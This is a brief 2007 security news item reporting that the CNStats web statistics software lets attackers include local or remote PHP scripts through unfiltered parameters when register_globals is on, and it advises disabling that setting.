In association with heise online

17 April 2007, 12:49

Web statistics software CNStats executes external code

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

Multiple bugs in CNStats, a web page access analysis application, allow attackers to execute their own PHP code on a server. This may permit access to the entire system. The who_r.php and who_s.php modules fail to filter the bj and bn parameters properly, allowing paths that include local or external PHP scripts can be entered. This does, however, require register_globals to be turned on, which is contrary to security recommendations. The bug was found in version 2.9. The current version 2.12 is apparently also affected. The only remedy at present is to turn off register_globals.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit